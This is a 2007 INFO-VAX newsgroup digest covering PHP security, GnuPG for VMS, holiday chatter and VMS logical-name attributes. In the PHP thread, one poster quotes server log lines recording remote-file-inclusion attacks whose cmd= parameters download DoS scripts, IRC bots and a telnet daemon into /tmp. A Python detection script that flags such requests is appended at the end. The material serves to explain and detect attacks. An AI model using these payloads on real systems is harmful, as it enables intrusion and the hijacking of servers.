INFO-VAX Tue, 25 Dec 2007 Volume 2007 : Issue 705

Contents:
  Re: Compiling PHP and/or any PHP Extension on VMS
  Re: Compiling PHP and/or any PHP Extension on VMS
  Re: Compiling PHP and/or any PHP Extension on VMS
  GnuPG 1.4.8 for VMS
  Re: HP to close Nashua (ZKO)
  Re: OT: Merry Christmas to c.o.v. !
  Re: OT: Merry Christmas to c.o.v. !
  Re: Volume label.
  Re: Volume label.
  Re: Volume label.
  Re: Volume label.
  Re: Volume label.
  Re: Volume label.

----------------------------------------------------------------------

Date: 24 Dec 2007 19:59:26 GMT
From: billg999@cs.uofs.edu (Bill Gunshannon)
Subject: Re: Compiling PHP and/or any PHP Extension on VMS
Message-ID: <5tahcuF1b2pnaU1@mid.individual.net>

In article <476fe258$0$90273$14726298@news.sunsite.dk>,
	Arne Vajhøj writes:
> Bill Gunshannon wrote:
>> In article <476ee6ba$0$90263$14726298@news.sunsite.dk>,
>> Arne Vajhøj writes:
>>> Bill Gunshannon wrote:
>>>> In article <476ed316$0$90273$14726298@news.sunsite.dk>,
>>>> Arne Vajhøj writes:
>>>>> Bugs in PHP itself are relatively rare. Bugs in apps written in PHP are
>>>>> relatively common.
>>>> It isn't just bugs. It is a language whose interface is designed to
>>>> let outsiders execute any command available on the system any time they
>>>> want to by merely adding it to the URL sent to the PHP script.
>>> ????
>>>
>>> It should save it in $_REQUEST, $_GET and $_SERVER but
>>> not execute it.
>>
>> Yeah, that would be nice, but reality is somewhat different.
>
> Do you have a reference? It sounds rather impossible to me.

The net is covered with security alerts about PHP. How about if I just
show you the kinds of things they have tried on my server?
------------------

httpd-access2.log:200.215.111.144 - - [29/Mar/2005:14:50:23 -0500] "GET /~cmps/template.php?body=http://www.bsmoney.com/BoSS.txt?&cmd=cd%20/tmp;fetch%20http://packetstormsecurity.nl/DoS/udp.pl HTTP/1.1" 404 300 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"

** This one is trying to download a UDP based DOS attack written in Perl
to the /tmp directory, where it will then be used to attack some other
from an "innocent" server.

httpd-access2.log:200.151.236.187 - - [07/Jun/2004:18:47:39 -0400] "GET /~mep2/index.php?page=http://www.starcraftbroodwars.hpg.ig.com.br/own.txt?&cmd=cd%20/tmp%20;%20fetch%20http://www.psychoid.lam3rz.de/psyBNC2.3.1.tar.gz HTTP/1.1" 200 5915 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt)"

** This one is downloading an IRC BOT. I will leave it to you to figure
out why. I stopped using IRC over a decade ago.

httpd-access.log:200.151.83.14 - - [20/May/2004:12:59:42 -0400] "GET /~mep2/tri.gif HTTP/1.1" 404 295 "http://www.cs.uofs.edu/~mep2/index.php?page=http://www.starcraftbroodwars.hpg.ig.com.br/own.txt?&cmd=cd%20/tmp%20;%20wget%20http://members.lycos.co.uk/xnelson/bnc.pl" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt)"

** Same thing written in Perl.

httpd-access.log:200.151.83.14 - - [20/May/2004:13:05:43 -0400] "GET /~mep2/tri.gif HTTP/1.1" 404 295 "http://www.cs.uofs.edu/~mep2/index.php?page=http://www.starcraftbroodwars.hpg.ig.com.br/own.txt?&cmd=netstat%20-an" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98;DigExt)"

** This one is running netstat, probably just fishing for addresses of
local machines or maybe just trying to see if the PHP exploit works.

httpd-access.log:80.178.183.122 - - [20/May/2004:17:46:12 -0400] "GET /~mep2/tri.gif HTTP/1.1" 404 295 "http://www.cs.uofs.edu/~mep2/index.php?page=http://ttyp1.hpgvip.com.br/hkz.txt?&cmd=id" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"

** This one is trying to see what user PHP scripts run as.
httpd-access.log:200.151.83.14 - - [20/May/2004:13:07:58 -0400] "GET /~mep2/tri.gif HTTP/1.1" 404 295 "http://www.cs.uofs.edu/~mep2/index.php?page=http://www.starcraftbroodwars.hpg.ig.com.br/own.txt?&cmd=ps%20x" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt)"

** This one is looking for what processes are running. Maybe to see if
the exploit worked?

httpd-access.log:80.178.183.122 - - [20/May/2004:17:46:22 -0400] "GET /~mep2/tri.gif HTTP/1.1" 404 295 "http://www.cs.uofs.edu/~mep2/index.php?page=http://ttyp1.hpgvip.com.br/hkz.txt?&cmd=uname%20-a" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"

** This one is probing for info on system type.

httpd-access.log:80.178.183.122 - - [20/May/2004:17:49:08 -0400] "GET /~mep2/tri.gif HTTP/1.1" 404 295 "http://www.cs.uofs.edu/~mep2/index.php?page=http://ttyp1.hpgvip.com.br/hkz.txt?&cmd=cd%20/tmp;pwd" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"

** This one seems to be testing whether or not changing directories
worked.

httpd-access.log:80.178.183.122 - - [20/May/2004:17:49:15 -0400] "GET /~mep2/tri.gif HTTP/1.1" 404 295 "http://www.cs.uofs.edu/~mep2/index.php?page=http://ttyp1.hpgvip.com.br/hkz.txt?&cmd=cd%20/tmp;wget%20talesrenan.vila.bol.com.br/telnetd" "Mozilla/4.0 (compatible;MSIE 6.0; Windows NT 5.1)"

** And this one is trying to use "wget" to download a telnet daemon that
probably bypasses the password part of the login.

---------------------

>
> Maybe except if PHP is run as CGI on an OS that supports multiple
> statements in a command line - or something like that.

I imagine the biggest use for PHP is as CGI and the "cmd=" is apparently
normal URL syntax. What it does is a function of PHP. I can not think
of any good, legitimate reason to allow this.

>
>>>> Perl and PHP are the antithesis of software engineering.
>>> They are not like the classic programming languages with declarations
>>> of data types etc..
>>
>> They are, by design, for "quick and dirty" programming.
>
> Web programming often fits that description very well.

And you don't see a problem with that?

bill

--
Bill Gunshannon          |  de-moc-ra-cy (di mok' ra see) n.  Three wolves
bill@cs.scranton.edu     |  and a sheep voting on what's for dinner.
University of Scranton   |
Scranton, Pennsylvania   |         #include

------------------------------

Date: Mon, 24 Dec 2007 15:29:37 -0500
From: JF Mezei
Subject: Re: Compiling PHP and/or any PHP Extension on VMS
Message-ID: <47701707$0$4349$c3e8da3@news.astraweb.com>

Bill Gunshannon wrote:
>>> They are, by design, for "quick and dirty" programming.
>>
>> Web programming often fits that description very well.
>
> And you don't see a problem with that?

If you see a problem with that, it will prevent you from getting many
jobs/contracts. You're not going to go very far at interviews when you
start to torpedo the technology chosen by star employee(s) in that
company (and potentially the interviewer himself).

In the end, pushing for web standard adherence hasn't gotten people far.
Pushing for quality and security hasn't gotten VMS anywhere. It is a sad
fact that the IT industry is made of sheep who religiously follow trends
that are set out by trade rags.

Giving people what they need doesn't work anymore. Giving them what they
want works.

One way to get a herd of sheep to move in a different direction is to
bark at them. (At least that works for cyclists in New Zealand.) In the
IT world, disturbing technologies (not sure if this is the actual
expression) are what cause the herd to start moving.

Large corporations like Bell Canada had gotten so brainwashed by Gates
that they had allowed their web sites serving millions of people to
actively block out non-Microsoft browsers. Then came Linux and
Mozilla/Firefox, and the trade rags have talked those up quite a bit,
and all of a sudden, those large corporations awaken to the stupidity
of their web sites and remove the code that prevented non-MS users from
accessing it.
(I am not talking about html features not working, it was code that
redirected non-MS users to a page telling them they couldn't access
their web sites).

Unfortunately, the dozen or so people left in this newsgroup don't have
the ability to influence the media and hence no ability to start/change
trends. The only solution is to go with the flow and stop fighting.
Resistance is futile.

------------------------------

Date: 24 Dec 2007 20:48:53 GMT
From: billg999@cs.uofs.edu (Bill Gunshannon)
Subject: Re: Compiling PHP and/or any PHP Extension on VMS
Message-ID: <5tak9lF1ctvl6U1@mid.individual.net>

In article <47701707$0$4349$c3e8da3@news.astraweb.com>,
	JF Mezei writes:
> Bill Gunshannon wrote:
>
>>>> They are, by design, for "quick and dirty" programming.
>>>
>>> Web programming often fits that description very well.
>>
>> And you don't see a problem with that?
>
>
> If you see a problem with that, it will prevent you from getting many
> jobs/contracts. You're not going to go very far at interviews when you
> start to torpedo the technology chosen by star employee(s) in that
> company (and potentially the interviewer himself).

Well, JF, at my age that is probably not going to be much of a problem.
There are enough jobs around that require my real skills without my
having to prostitute myself and contribute to the problems that are
rapidly destroying the INTERNET as a serious place to do business.

>
> In the end, pushing for web standard adherence hasn't gotten people far.
> Pushing for quality and security hasn't gotten VMS anywhere. It is a sad
> fact that the IT industry is made of sheep who religiously follow trends
> that are set out by trade rags.
>
> Giving people what they need doesn't work anymore. Giving them what they
> want works.

Damn, you're more cynical than even me.

bill

--
Bill Gunshannon          |  de-moc-ra-cy (di mok' ra see) n.  Three wolves
bill@cs.scranton.edu     |  and a sheep voting on what's for dinner.
University of Scranton   |
Scranton, Pennsylvania   |         #include

------------------------------

Date: Mon, 24 Dec 2007 22:41:40 -0600 (CST)
From: sms@antinode.org (Steven M. Schweda)
Subject: GnuPG 1.4.8 for VMS
Message-ID: <07122422414019_202647DE@antinode.org>

   Anyone interested in GnuPG 1.4.8 for VMS (or merely desperate for
amusement) might wish to consider:

      http://antinode.org/dec/sw/gnupg.html

   No big new features, although there's a bit more tolerance for ODS2
file names. It's tested about as much as previous versions, which is to
say, hardly, but complaints are always welcome. As before, if anyone is
actually using this stuff, I'd like to hear about it.

   I see that HP has advanced to version 1.4.7 while I wasn't looking
("http://h71000.www7.hp.com/opensource/gnupg.html"), but if you think
that you'd be entertained by an embarrassingly lame build procedure, I
heartily recommend the one supplied in that kit. (Hint: The comment
which says "Alpha/VAX" is pretty serious. Of course, those IA64 systems
are so fast that compiling everything with optimization is probably a
waste of effort, anyway. It's easy to see why they didn't update their
VAX kit, too. Sigh.)

------------------------------------------------------------------------

   Steven M. Schweda               sms@antinode-org
   382 South Warwick Street        (+1) 651-699-9818
   Saint Paul  MN  55105-2547

------------------------------

Date: Mon, 24 Dec 2007 20:27:13 +0100
From: "Dr. Dweeb"
Subject: Re: HP to close Nashua (ZKO)
Message-ID: <47700811$0$21925$157c6196@dreader1.cybercity.dk>

Phillip Helbig---remove CLOTHES to reply wrote:
> In article <476ec059$0$21927$157c6196@dreader1.cybercity.dk>, "Dr.
> Dweeb" writes:
>
>> I live in a country with the highest taxation on the planet.
>
> Denmark?

netop! [exactly!]

------------------------------

Date: Mon, 24 Dec 2007 14:32:54 -0800 (PST)
From: Neil Rieck
Subject: Re: OT: Merry Christmas to c.o.v. !
Message-ID:

On Dec 24, 8:41 am, billg...@cs.uofs.edu (Bill Gunshannon) wrote:
> In article ,
>    VAXman- @SendSpamHere.ORG writes:

[...snip...]

>
>
> so is James T. Kirk, but that doesn't stop people from discussing
> him (even here!) like he was real. Kinda like the guys from NASA
> that get involved in the "technical" discussions of warp drive
> every once in a while.
>

Hey wait a minute. It's one thing to deny the existence of Jesus and
Santa, but quite something else to deny the existence of James T Kirk.

Like the poster says, "Everything I learned in life, I learned from
Star Trek" :-)

  Seek out new life and new civilizations
  Non-interference is the prime directive
  Keep your phaser set on stun
  Humans are highly illogical
  There's no such thing as a Vulcan death grip
  Live long and prosper
  Having is not so pleasing a thing as wanting; it is not logical, but
    it is often true
  Infinite diversity in infinite combinations (IDIC)
  Tribbles hate Klingons (and Klingons hate Tribbles)
    (editor's note: I guess that makes me Klingon!)
  Enemies are often invisible - like Klingons, they can be cloaked
  Don't put all your ranking officers in one shuttle craft
  When your logic fails, trust a hunch
  Insufficient data does not compute
  If it can't be fixed, just ask Scotty
  Even in our own world, sometimes we are aliens
  When going out into the Universe, remember: "Boldly go where no man
    has gone before!"

Neil Rieck
Kitchener/Waterloo/Cambridge, Ontario, Canada.
http://www3.sympatico.ca/n.rieck/

------------------------------

Date: Mon, 24 Dec 2007 22:38:18 -0600
From: David J Dachtera
Subject: Re: OT: Merry Christmas to c.o.v. !
Message-ID: <4770893A.DBDD6C96@spam.comcast.net>

JF Mezei wrote:
>
> VAXman- @SendSpamHere.ORG wrote:
> > Psst. JF, I hate to break this to you but that Santa character is a
> > myth... like religion, he exists to fill some human flaw which seems
> > to yearn for the belief in non-existing do-gooders.
>
> That is wrong. Santa even has an official postal code: H0H 0H0.
> http://www.postescanada.ca/dec/santa/writesanta/default-e.asp
>
> Norad is currently tracking him.
>
> http://www.norad.mil/Home.html
> (click on the Norad tracks Santa image on the left column of home page).
>
> And how dare you suggest, on this Christmas Eve, that no children in the
> world will be getting gifts from Santa if they behaved this year?
>
> And unlike the Loch Ness monster or Sasquatch, there are plenty of
> pictures of Santa Claus all over the planet.
>
> Santa is an essential part that fuels kids' imaginations. Killing Santa
> is just plain dead wrong, especially on the 24th of December. That is far
> worse than asking a slightly plump lady if she is pregnant.

Well, it happens often enough that some "slightly plump" "ladies" don't
find out they're pregnant until they deliver - one made the news in this
area about this time last month, as I recall.

The "Santa Claus" character, as we in the U.S. know it, was the central
figure in an advertising campaign run by the Coca Cola company back about
a 100 years or so ago. It has since become part of Americana, indeed,
part of the "world" of Christmas, following onto Father Christmas, the
"real" Story of Saint Nicholas, and so on. "Rudolph" followed some time
later, as I understand.

David J Dachtera
DJE Systems

------------------------------

Date: Mon, 24 Dec 2007 11:43:31 -0800 (PST)
From: AEF
Subject: Re: Volume label.
Message-ID: <3f212454-ab83-4d30-8d8d-f3064dbce599@j64g2000hsj.googlegroups.com>

On Dec 24, 9:55 am, hel...@astro.multiCLOTHESvax.de (Phillip Helbig---
remove CLOTHES to reply) wrote:
> In article
> <1384b006-7d60-4c3b-9dbc-0a0bc3254...@e6g2000prf.googlegroups.com>, AEF
>
> writes:
>
> > > > > In this example, how would it stop the user from simply redefining the
> > > > > application logical names?
>
> > > > If they are terminal, then if one points to DSA425, he can't define
> > > > DSA425 himself.
>
> > > Or, rather, he can, but it wouldn't affect an application using a
> > > logical name pointing to DSA425 and specified as TERMINAL.
>
> > But he could just redefine the logical name that points to DSA425:
> > [something]. So you still need to ignore user and supervisor mode
> > logical names.
>
> Yes, that's why I mentioned NOALIAS. That, of course, will also cover
> the case above, so arguably TERMINAL isn't needed for this reason. (Was
> TERMINAL, or its functional equivalent, introduced before NOALIAS?
> Probably, since the leading _ goes way back.)
>
> Was the original function of TERMINAL to save CPU cycles by saving the
> last translation attempt?

I was trying to copy and paste a Google Groups thread here but for some
reason the paste operation screws up the entire input field. So do this:
Search for TERMINAL PURPOSE in comp.os.vms on Google Groups
(groups.google.com/group/comp.os.vms) and read the first thread that
pops up.

Also, run a command like

$ SHOW LOGICAL/FULL */TABLE=*

and check out logical names like

   "LNM$STARTUP_TABLE" [exec,table] = "" [terminal]

Since you can't reDEFINE "", I suppose this would support the
saving-CPU-cycles theory. Also, I think it's just a precaution against
a user or system mangler from redefining the device or logical name
portions of equivalence names of important logical names. So I think
it's both: saving CPU cycles and preventing the
define-a-device-name-as-a-logical-name quick-and-dirty "fix" trick.

AEF

------------------------------

Date: Mon, 24 Dec 2007 15:12:22 -0500
From: JF Mezei
Subject: Re: Volume label.
Message-ID: <477012e2$0$25359$c3e8da3@news.astraweb.com>

AEF wrote:
> So I think it's both: saving CPU cycles and preventing the
> define-a-device-name-as-a-logical-name quick-and-dirty "fix" trick.
consider the following:

$DEFINE/qualifiers SYSUAF $11$DQA0:[shared]sysuaf.dat

without a trans=terminal, someone could define a logical name $11$dqa0
to point to another drive (or one they created with the LDdriver).

------------------------------

Date: Mon, 24 Dec 2007 15:26:59 -0800 (PST)
From: AEF
Subject: Re: Volume label.
Message-ID: <5c3db750-06ba-4919-a381-e2ab3c00b4a9@21g2000hsj.googlegroups.com>

On Dec 24, 4:12 pm, JF Mezei wrote:
> AEF wrote:
> > So I think it's both: saving CPU cycles and preventing the
> > define-a-device-name-as-a-logical-name quick-and-dirty "fix" trick.
>
> consider the following:
>
> $DEFINE/qualifiers SYSUAF $11$DQA0:[shared]sysuaf.dat
>
> without a trans=terminal, someone could define a logical name $11$dqa0
> to point to another drive (or one they created with the LDdriver).

Nope. You have to do

$ DEFINE $11$DQA0 /SYSTEM/EXECUTIVE_MODE
                         ^^^^^^^^^^^^^^^

for this redirect to work. And if you can do that, well, you're already
well on your way to being able to cause trouble, no?

AEF

------------------------------

Date: Mon, 24 Dec 2007 16:09:52 -0800 (PST)
From: AEF
Subject: Re: Volume label.
Message-ID:

On Dec 24, 6:26 pm, AEF wrote:
> On Dec 24, 4:12 pm, JF Mezei wrote:
>
> > AEF wrote:
> > > So I think it's both: saving CPU cycles and preventing the
> > > define-a-device-name-as-a-logical-name quick-and-dirty "fix" trick.
>
> > consider the following:
>
> > $DEFINE/qualifiers SYSUAF $11$DQA0:[shared]sysuaf.dat
>
> > without a trans=terminal, someone could define a logical name $11$dqa0
> > to point to another drive (or one they created with the LDdriver).
>
> Nope. You have to do
>
> $ DEFINE $11$DQA0 /SYSTEM/EXECUTIVE_MODE
>                          ^^^^^^^^^^^^^^^
>
> for this redirect to work. And if you can do that, well, you're
> already well on your way to being able to cause trouble, no?
>
> AEF

Hell, if you already have access to the SYSTEM logical name table,
you're already well on your way to being able to cause trouble.
Just *specifically* what are you concerned about?

AEF

------------------------------

Date: Mon, 24 Dec 2007 22:21:18 -0600
From: David J Dachtera
Subject: Re: Volume label.
Message-ID: <4770853E.6A8EDFAA@spam.comcast.net>

Phillip Helbig---remove CLOTHES to reply wrote:
>
> In article , helbig@astro.multiCLOTHESvax.de
> (Phillip Helbig---remove CLOTHES to reply) writes:
>
> > In article
> > <319ff94e-2a42-4f73-a808-5e533635b184@s48g2000hss.googlegroups.com>, AEF
> > writes:
> >
> > > In this example, how would it stop the user from simply redefining the
> > > application logical names?
> >
> > If they are terminal, then if one points to DSA425, he can't define
> > DSA425 himself.
>
> Or, rather, he can, but it wouldn't affect an application using a
> logical name pointing to DSA425 and specified as TERMINAL.

If the LNM in question exists in a Group or System table, but is aliased
in a Process or Job table, the alias can override, regardless of whether
the "real" translation has the TERMINAL attribute. NO_ALIAS would be
important here.

David J Dachtera
DJE Systems

Remember that LNMs can also be search lists.

------------------------------

Date: Mon, 24 Dec 2007 22:27:52 -0600
From: David J Dachtera
Subject: Re: Volume label.
Message-ID: <477086C8.174D5E0A@spam.comcast.net>

Phillip Helbig---remove CLOTHES to reply wrote:
>
> In article
> <1384b006-7d60-4c3b-9dbc-0a0bc3254779@e6g2000prf.googlegroups.com>, AEF
> writes:
> >
> > > > > In this example, how would it stop the user from simply redefining the
> > > > > application logical names?
> >
> > > > If they are terminal, then if one points to DSA425, he can't define
> > > > DSA425 himself.
> >
> > > Or, rather, he can, but it wouldn't affect an application using a
> > > logical name pointing to DSA425 and specified as TERMINAL.
> >
> > But he could just redefine the logical name that points to DSA425:
> > [something]. So you still need to ignore user and supervisor mode
> > logical names.
>
> Yes, that's why I mentioned NOALIAS. That, of course, will also cover
> the case above, so arguably TERMINAL isn't needed for this reason. (Was
> TERMINAL, or its functional equivalent, introduced before NOALIAS?

Be careful about how you think of /TERMINAL.

- /TERMINAL does NOT prevent the system from continuing to traverse a
  search list.

- /NOALIAS means that a LNM can not be DEFINEd at a lower privilege
  level. For example: a LNM DEFINEd /EXEC cannot be aliased in either
  /SUPER or /USER. This is *NOT* the same as abandoning translation
  recursion for any element of a search list.

David J Dachtera
DJE Systems

------------------------------

End of INFO-VAX 2007.705
************************
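The access-log lines Bill Gunshannon quotes in the PHP thread earlier in this digest make a good fixture for a detection rule. As an added example (not from the digest or any of its posters), the Python below parses Apache combined-format lines, tolerating the `file:` prefix that grep leaves, and flags query parameters that carry a remote URL or a `cmd` argument in either the request or the Referer, which is where the attack URL ends up once the included script fetches `tri.gif` from the victim. The three malicious sample lines are quoted from the post; the benign fourth line and its 192.0.2.10 address are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Apache "combined" format; an optional leading "filename:" (grep output) is accepted.
LOG_RE = re.compile(
    r'^(?:[\w.\-]+:)?(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+)(?: [^"]*)?" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)

# Lines 1-3 are quoted from the post; line 4 is a constructed benign request.
SAMPLE_LOG = [
    'httpd-access2.log:200.215.111.144 - - [29/Mar/2005:14:50:23 -0500] "GET /~cmps/template.php?body=http://www.bsmoney.com/BoSS.txt?&cmd=cd%20/tmp;fetch%20http://packetstormsecurity.nl/DoS/udp.pl HTTP/1.1" 404 300 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"',
    'httpd-access.log:200.151.83.14 - - [20/May/2004:13:05:43 -0400] "GET /~mep2/tri.gif HTTP/1.1" 404 295 "http://www.cs.uofs.edu/~mep2/index.php?page=http://www.starcraftbroodwars.hpg.ig.com.br/own.txt?&cmd=netstat%20-an" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98;DigExt)"',
    'httpd-access.log:80.178.183.122 - - [20/May/2004:17:46:12 -0400] "GET /~mep2/tri.gif HTTP/1.1" 404 295 "http://www.cs.uofs.edu/~mep2/index.php?page=http://ttyp1.hpgvip.com.br/hkz.txt?&cmd=id" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"',
    '192.0.2.10 - - [20/May/2004:12:00:00 -0400] "GET /~mep2/index.php?page=about HTTP/1.1" 200 1234 "-" "Mozilla/5.0"',
]


def rfi_indicators(url):
    """Return {param: value} for query parameters that look like remote-file
    inclusion abuse: a value that is itself an http(s) URL (the include
    target) or a 'cmd' parameter (what the included script is asked to run)."""
    hits = {}
    query = urlsplit(url).query          # works for "/path?x=y" and full URLs
    for name, values in parse_qs(query, keep_blank_values=True).items():
        for value in values:             # parse_qs already percent-decodes
            if re.match(r'(?i)https?://', value) or name.lower() == 'cmd':
                hits[name] = value
    return hits


def scan_access_log(lines):
    """Parse each line and report RFI indicators found in the request target
    or the Referer. One finding per field, so a single line can yield two."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line.strip())
        if not m:
            continue                     # unparseable; count these separately in production
        for field in ('target', 'referer'):
            hits = rfi_indicators(m.group(field))
            if hits:
                findings.append({'ip': m.group('ip'), 'time': m.group('ts'),
                                 'status': int(m.group('status')),
                                 'field': field, 'params': hits})
    return findings


if __name__ == '__main__':
    for f in scan_access_log(SAMPLE_LOG):
        print(f"{f['ip']} {f['time']} [{f['field']}] {f['params']}")
```

A 200 status on such a request (as on the psyBNC line in the post) is the one to escalate, since it means the include and the command were actually served rather than refused.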